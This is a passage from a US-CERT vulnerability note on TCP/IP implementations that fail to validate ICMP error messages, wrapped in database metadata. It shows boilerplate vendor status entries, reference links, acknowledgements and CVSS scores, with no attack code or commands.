regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SecureWorx __ Unknown\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sequent Computer Systems, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sony Corporation __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### TurboLinux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Unisys __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### ZyXEL __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### eSoft __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### References\n\n * <http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html>\n * <http://tools.ietf.org/wg/opsec/draft-gont-opsec-icmp-filtering-00.txt>\n * <http://www.ietf.org/rfc/rfc792.txt>\n * <http://www.ietf.org/rfc/rfc1122.txt>\n * <http://www.ietf.org/rfc/rfc1191.txt>\n * <http://www.ietf.org/rfc/rfc1323.txt>\n * <http://www.ietf.org/rfc/rfc2385.txt>\n * <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf>\n * <http://jvn.jp/niscc/532967/index.html>\n * <http://xforce.iss.net/xforce/xfdb/17170>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0065>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0066>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0067>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0068>\n * <http://www.securiteam.com/securitynews/5AP0D2A35U.html>\n * <http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-02.txt>\n * <http://www.ietf.org/ietf/03mar/plpmtud.txt>\n * <http://www.psc.edu/~mathis/MTU/>\n * <http://www.cymru.com/Documents/icmp-messages.html>\n * <http://secunia.com/advisories/14904/>\n * <http://securitytracker.com/alerts/2005/Apr/1013686.html>\n\n### Acknowledgements\n\nInformation about the security risks of ICMP messages has been known for some time (RFC 1191 was published in 1990). More recent work by Fernando Gont (Universidad Tecnol\u00f3gica Nacional - Facultad Regional Haedo) describes different types of ICMP attacks against TCP and proposes a number of defense techniques. 
Gont's research is documented in an IETF Internet Draft titled \"ICMP attacks against TCP\" (revision 3 as of this writing). Jonathan Looney researched and reported a specific ICMP attack that affects TCP connections on Microsoft Windows systems.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Severity Metric:** | 12.48 \n**Date Public:** | 2005-04-12 \n**Date First Published:** | 2005-04-12 \n**Date Last Updated: ** | 2008-04-22 22:34 UTC \n**Document Revision: ** | 90 \n", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "cert", "title": "TCP/IP implementations do not adequately validate ICMP error messages", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-04-22T22:34:00", "id": "VU:222750", "href": "https://www.kb.cert.org/vuls/id/222750", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}